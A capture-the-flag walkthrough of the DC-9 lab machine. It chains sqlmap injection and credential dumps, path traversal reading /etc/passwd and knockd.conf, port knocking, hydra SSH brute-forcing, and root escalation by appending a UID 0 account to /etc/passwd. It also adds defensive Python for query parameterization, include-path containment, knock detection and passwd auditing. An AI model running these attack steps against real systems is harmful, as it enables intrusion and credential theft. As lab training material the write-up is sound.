Machine link: https://www.vulnhub.com/entry/dc-9,412/
STEP1
arp-scan -l
FINDING
192.168.31.195
----------------------------------------------------------------------------------------------------------
STEP2
nmap 192.168.31.195 -p- -Pn -A -T4 -sSV
FINDING
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
----------------------------------------------------------------------------------------------------------
STEP3
dirb http://192.168.31.195/
FINDING
---- Scanning URL: http://192.168.31.195/ ----
== DIRECTORY: http://192.168.31.195/css/
== DIRECTORY: http://192.168.31.195/includes/
+ http://192.168.31.195/index.php (CODE:200|SIZE:917)
+ http://192.168.31.195/server-status (CODE:403|SIZE:279)
----------------------------------------------------------------------------------------------------------
STEP4
http://192.168.31.195/results.php
intercept the request in Burp
save the request to a .txt file
on the terminal, run sqlmap against the saved request
sqlmap -r dc9packet.txt --dbs --batch
FINDING
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=asad UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7871,0x446a484c415156664359744d614d6979796c54704376496569634b5a7764656b534c495545587269,0x716b626a71),NULL,NULL,NULL-- -
---
[01:53:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL = 5.0.12 (MariaDB fork)
[01:53:58] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users
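The UNION injection sqlmap found in results.php exists because the search term is spliced into the query text. Added example, not code from the page or from DC-9: the vulnerable pattern beside its parameterized fix, using an in-memory SQLite stand-in (constructed tables with the page's names, made-up rows, a placeholder hash, and an assumed quoted string context since the page never shows the PHP).

```python
import sqlite3

# Constructed stand-in for the Staff database from the walkthrough: same table
# and column names, made-up row contents. SQLite replaces MariaDB here.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE StaffDetails(firstname TEXT, lastname TEXT, position TEXT,
                                  email TEXT, phone TEXT, id INTEGER);
        CREATE TABLE Users(UserID INTEGER, Username TEXT, Password TEXT);
        INSERT INTO StaffDetails VALUES ('Mary','Moe','Manager','mary@example.test','555-0100',1);
        INSERT INTO Users VALUES (1,'admin','<hash-placeholder>');
    """)
    return con

def search_vulnerable(con, term):
    # The search term is spliced into the SQL text, so a UNION inside the term
    # is parsed as SQL: this is the defect sqlmap exploited in results.php.
    sql = ("SELECT firstname, lastname, position, email, phone, id "
           f"FROM StaffDetails WHERE firstname = '{term}'")
    return con.execute(sql).fetchall()

def search_parameterized(con, term):
    # The term is bound as a value; the statement text never changes.
    sql = ("SELECT firstname, lastname, position, email, phone, id "
           "FROM StaffDetails WHERE firstname = ?")
    return con.execute(sql, (term,)).fetchall()

# Six-column UNION in the same shape as the payload sqlmap reported, aimed at
# the Users table (assumed quoted string context; the page does not show the PHP).
PAYLOAD = "asad' UNION ALL SELECT Username, Password, NULL, NULL, NULL, NULL FROM Users-- -"

def demo():
    con = make_db()
    return {
        "vulnerable": search_vulnerable(con, PAYLOAD),      # leaks the admin row
        "parameterized": search_parameterized(con, PAYLOAD),  # no such first name
    }
```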
----------------------------------------------------------------------------------------------------------
STEP5
to get tables from Staff
sqlmap -r dc9packet.txt --level=3 -D Staff --tables
FINDING
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users |
+--------------+
----------------------------------------------------------------------------------------------------------
STEP6
to get the columns and data from the StaffDetails and Users tables
sqlmap -r dc9packet.txt --level=3 -D Staff -T StaffDetails --columns
FINDING
Table: StaffDetails
[7 columns]
+-----------+-----------------+
| Column | Type |
+-----------+-----------------+
| position | varchar(100) |
| email | varchar(50) |
| firstname | varchar(30) |
| id | int(6) unsigned |
| lastname | varchar(30) |
| phone | varchar(20) |
| reg_date | timestamp |
+-----------+-----------------+
sqlmap -r dc9packet.txt --level=3 -D Staff -T Users --columns
FINDING
Table: Users
[3 columns]
+----------+-----------------+
| Column | Type |
+----------+-----------------+
| Password | varchar(255) |
| UserID | int(6) unsigned |
| Username | varchar(255) |
+----------+-----------------+
sqlmap -r dc9packet.txt --level=3 -D Staff -T Users -C Password,UserID,Username --dump
Database: Staff
Table: Users
[1 entry]
+--------------------------------------------------+--------+----------+
| Password | UserID | Username |
+--------------------------------------------------+--------+----------+
| 856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) | 1 | admin |
+--------------------------------------------------+--------+----------+
----------------------------------------------------------------------------------------------------------
STEP7
to get tables from users
sqlmap -r dc9packet.txt --level=3 -D users --tables
FINDING
Database: users
[1 table]
+-------------+
| UserDetails |
+-------------+
to get the columns from the users database
sqlmap -r dc9packet.txt --level=3 -D users -T UserDetails --columns
FINDING
Database: users
Table: UserDetails
[6 columns]
+-----------+-----------------+
| Column | Type |
+-----------+-----------------+
| firstname | varchar(30) |
| id | int(6) unsigned |
| lastname | varchar(30) |
| password | varchar(20) |
| reg_date | timestamp |
| username | varchar(30) |
+-----------+-----------------+
sqlmap -r dc9packet.txt --level=3 -D users -T UserDetails -C firstname,id,lastname,password,reg_date,username --dump
Database: users
Table: UserDetails
[17 entries]
+-----------+----+------------+---------------+---------------------+-----------+
| firstname | id | lastname | password | reg_date | username |
+-----------+----+------------+---------------+---------------------+-----------+
| Mary | 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym |
| Julie | 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied |
| Fred | 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf |
| Barney | 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr |
| Tom | 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc |
| Jerry | 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym |
| Wilma | 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf |
| Betty | 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr |
| Chandler | 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb |
| Joey | 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt |
| Rachel | 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg |
| Ross | 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg |
| Monica | 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag |
| Phoebe | 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb |
| Scooter | 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots |
| Donald | 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor |
| Scott | 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 |
+-----------+----+------------+---------------+---------------------+-----------+
----------------------------------------------------------------------------------------------------------
STEP8
log in as admin with the recovered password transorbital1
after logging in, the bottom of the page reads "File does not exist"
so we try an LFI at http://192.168.31.195/manage.php?file=../../../../../../../etc/passwd
it works, which confirms the LFI
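manage.php includes whatever path its file parameter names, which is why the traversal above reaches /etc/passwd. Added example (not the page's or DC-9's code) of the containment check a fixed include handler needs: the requested name is resolved against the web root and rejected unless the resolved path stays inside it. The temporary directory and report.php are constructed stand-ins for the real root.

```python
import tempfile
from pathlib import Path

def resolve_include(base_dir, requested):
    """Return the file under base_dir that `requested` names, or raise if it escapes."""
    base = Path(base_dir).resolve()
    # Joining an absolute `requested` ('/etc/passwd') silently discards base, and
    # '..' segments walk out of it, so resolve first and then test containment
    # on the resolved path rather than on the raw string.
    candidate = (base / requested).resolve()
    if base not in candidate.parents:
        raise ValueError(f"refused: {requested!r} resolves to {candidate}")
    if not candidate.is_file():
        raise FileNotFoundError(candidate)
    return candidate

def include_allowed(base_dir, requested):
    try:
        resolve_include(base_dir, requested)
        return True
    except (ValueError, FileNotFoundError):
        return False

def demo():
    # Constructed web root with one legitimate include file.
    with tempfile.TemporaryDirectory() as root:
        (Path(root) / "report.php").write_text("<?php echo 'report'; ?>\n")
        return {
            "normal": include_allowed(root, "report.php"),
            "traversal": include_allowed(root, "../../../../../../../etc/passwd"),
            "absolute": include_allowed(root, "/etc/knockd.conf"),
            "missing": include_allowed(root, "nope.php"),
        }
```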
----------------------------------------------------------------------------------------------------------
STEP9
http://192.168.31.195/manage.php?file=../../../../../../../etc/knockd.conf
FINDING
[options]
	UseSyslog

[openSSH]
	sequence    = 7469,8475,9842
	seq_timeout = 25
	command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
	tcpflags    = syn

[closeSSH]
	sequence    = 9842,8475,7469
	seq_timeout = 25
	command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
	tcpflags    = syn
we find that the [openSSH] knock sequence is 7469,8475,9842 (and [closeSSH] is the same ports in reverse)
----------------------------------------------------------------------------------------------------------
STEP10
to open the SSH port, send the knock sequence in order
knock 192.168.1.8 7469 8475 9842
then
nmap -p22 192.168.1.8
port 22 is now reported open
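Once the sequence has leaked through the LFI, knockd itself will not tell you who used it, but a firewall LOG rule on the three ports will. Added example, not from the page: a detector that replays constructed iptables-style log lines and reports every source that completed the [openSSH] sequence inside seq_timeout, using the values from the recovered knockd.conf. The log line layout (ISO timestamp followed by the usual SRC=/DPT= fields) is an assumption.

```python
import re
from datetime import datetime

OPEN_SEQ = [7469, 8475, 9842]   # [openSSH] sequence from the recovered knockd.conf
SEQ_TIMEOUT = 25                # seq_timeout in seconds, same file

# Assumed log shape: ISO timestamp, then iptables LOG fields. Constructed for this example.
LINE_RE = re.compile(r"^(\S+) .*SRC=(\S+) .*PROTO=TCP .*DPT=(\d+) .*SYN")

def find_knocks(lines, sequence=OPEN_SEQ, timeout=SEQ_TIMEOUT):
    """Return (src_ip, completion_time) for each completed open sequence."""
    progress = {}   # src -> (index of next expected port, time of first knock)
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.fromisoformat(m.group(1))
        src, dport = m.group(2), int(m.group(3))
        idx, start = progress.get(src, (0, ts))
        if idx and (ts - start).total_seconds() > timeout:
            idx = 0                      # partial sequence expired, as knockd would drop it
        if dport == sequence[idx]:
            if idx == 0:
                start = ts
            idx += 1
        elif dport == sequence[0]:
            idx, start = 1, ts           # wrong port, but this one restarts a sequence
        else:
            idx = 0
        if idx == len(sequence):
            hits.append((src, ts.isoformat()))
            idx = 0
        progress[src] = (idx, start)
    return hits

# Constructed sample: .50 knocks correctly; .77 waits 40 s between knocks and times out.
SAMPLE_LOG = """\
2024-01-05T10:00:01 dc9 kernel: [IPT] IN=eth0 SRC=192.168.31.50 DST=192.168.31.195 PROTO=TCP SPT=51000 DPT=7469 SYN
2024-01-05T10:00:02 dc9 kernel: [IPT] IN=eth0 SRC=192.168.31.50 DST=192.168.31.195 PROTO=TCP SPT=51001 DPT=8475 SYN
2024-01-05T10:00:03 dc9 kernel: [IPT] IN=eth0 SRC=192.168.31.50 DST=192.168.31.195 PROTO=TCP SPT=51002 DPT=9842 SYN
2024-01-05T10:01:00 dc9 kernel: [IPT] IN=eth0 SRC=192.168.31.77 DST=192.168.31.195 PROTO=TCP SPT=42000 DPT=7469 SYN
2024-01-05T10:01:40 dc9 kernel: [IPT] IN=eth0 SRC=192.168.31.77 DST=192.168.31.195 PROTO=TCP SPT=42001 DPT=8475 SYN
2024-01-05T10:01:41 dc9 kernel: [IPT] IN=eth0 SRC=192.168.31.77 DST=192.168.31.195 PROTO=TCP SPT=42002 DPT=9842 SYN
"""
```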
----------------------------------------------------------------------------------------------------------
STEP11
build a username list and a password list from the dumped UserDetails table
hydra -L /root/Desktop/dc9users.txt -P /root/Desktop/dc9userspassword.txt -s 22 192.168.31.195 ssh
FINDING
[22][ssh] host: 192.168.31.195 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.31.195 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.31.195 login: janitor password: Ilovepeepee
----------------------------------------------------------------------------------------------------------
STEP12
ssh chandlerb@192.168.31.195
password: UrAG0D!
su janitor
password: Ilovepeepee
cd /home
cd janitor
ls -la
cd .secrets-for-putin
ls -la
cat passwords-found-on-post-it-notes.txt
FINDING
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
----------------------------------------------------------------------------------------------------------
STEP13
save this password list as dc9userspassword2.txt and run hydra again against the remaining usernames
hydra -L /root/Desktop/dc9users.txt -P /root/Desktop/dc9userspassword2.txt -s 22 192.168.31.195 ssh
FINDING
[22][ssh] host: 192.168.31.195 login: fredf password: B4-Tru3-001
----------------------------------------------------------------------------------------------------------
STEP14
ssh fredf@192.168.31.195
password: B4-Tru3-001
sudo -l
FINDING
(root) NOPASSWD: /opt/devstuff/dist/test/test
----------------------------------------------------------------------------------------------------------
STEP15
create a password hash (md5-crypt, salt shad, password 123456)
openssl passwd -1 -salt shad 123456
$1$shad$XWjl/m8zVxYjY.AZYP0F3/
write a passwd entry for a new UID 0 user into a file in /tmp (single quotes stop the shell from expanding the $ signs in the hash)
echo 'asad:$1$shad$XWjl/m8zVxYjY.AZYP0F3/:0:0::/root:/bin/bash' > /tmp/raja
cd /opt/devstuff/dist/test
sudo ./test /tmp/raja /etc/passwd
su asad
password: 123456
whoami
root
ls -la
cat theflag.txt
███╗ ██╗██╗ ██████╗███████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██╗██╗██╗
████╗ ██║██║██╔════╝██╔════╝ ██║ ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║ █████╗ ██║ █╗ ██║██║ ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║ ██╔══╝ ██║███╗██║██║ ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗ ╚███╔███╔╝╚██████╔╝██║ ██║██║ ██╗██╗██╗██╗
╚═╝ ╚═══╝╚═╝ ╚═════╝╚══════╝ ╚══╝╚══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝╚═╝
Congratulations - you have done well to get to this point.
Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.
I also want to send out a big thank you to the various members of @m0tl3ycr3w .
They are an inspirational bunch of fellows.
Sure, they might smell a bit, but...just kidding. :-)
Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.
So long, and thanks for all the fish.
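The escalation in STEP15 works only because a NOPASSWD sudo rule lets a file-append tool write to /etc/passwd, leaving behind a second UID 0 account with its hash in the passwd field. Added example, not the page's code: a Python audit that flags that entry and diffs the file against a known-good snapshot. The baseline is constructed (fredf's uid is made up); the appended line is the one the walkthrough wrote.

```python
def audit_passwd(text):
    """Flag /etc/passwd entries that a routine integrity check should never accept."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, "malformed entry", line))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if uid == "0" and name != "root":
            findings.append((lineno, "extra uid0 account", name))
        if pw == "":
            findings.append((lineno, "empty password field", name))
        elif pw not in ("x", "*", "!", "!!"):
            # A real hash here is used directly instead of /etc/shadow, which is
            # exactly why the appended asad entry lets `su asad` succeed with 123456.
            findings.append((lineno, "hash stored in /etc/passwd", name))
    return findings

def added_entries(baseline, current):
    """Lines present now but absent from the last known-good snapshot."""
    known = set(baseline.splitlines())
    return [l for l in current.splitlines() if l and l not in known]

# Constructed baseline snapshot; fredf's uid/gid are made up for the example.
BASELINE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1003:1003:Fred Flintstone,,,:/home/fredf:/bin/bash
"""
# The last line is the entry the walkthrough appended through the sudo-able test binary.
AFTER_APPEND = BASELINE + "asad:$1$shad$XWjl/m8zVxYjY.AZYP0F3/:0:0::/root:/bin/bash\n"
```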
----------------------------------------------------------------------------------------------------------